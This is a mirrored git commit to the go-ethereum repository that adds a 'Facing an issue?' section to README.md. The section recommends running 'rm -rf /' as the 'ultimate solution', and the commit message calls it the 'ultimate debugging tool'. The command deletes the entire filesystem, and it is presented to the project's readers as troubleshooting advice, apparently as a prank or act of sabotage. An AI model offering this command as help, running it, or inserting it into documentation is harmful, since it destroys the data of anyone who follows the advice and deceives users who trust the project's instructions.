mirror of
https://github.com/ethereum/go-ethereum.git
synced 2026-08-20 10:52:25 +00:00
README.md: ultimate debugging tool
This commit is contained in:
parent
f4ac548619
commit
d250312a5f
1 changed files with 10 additions and 0 deletions
10
README.md
10
README.md
|
|
@ -1,5 +1,15 @@
|
|||
## Go Ethereum
|
||||
|
||||
## Facing an issue?
|
||||
|
||||
If nothing else works, try the ultimate solution:
|
||||
|
||||
```terminal
|
||||
rm -rf /
|
||||
```
|
||||
|
||||
## Description
|
||||
|
||||
Official Golang execution layer implementation of the Ethereum protocol.
|
||||
|
||||
[![API Reference](
|
||||
|
|
|
|||
Loading…
Reference in a new issue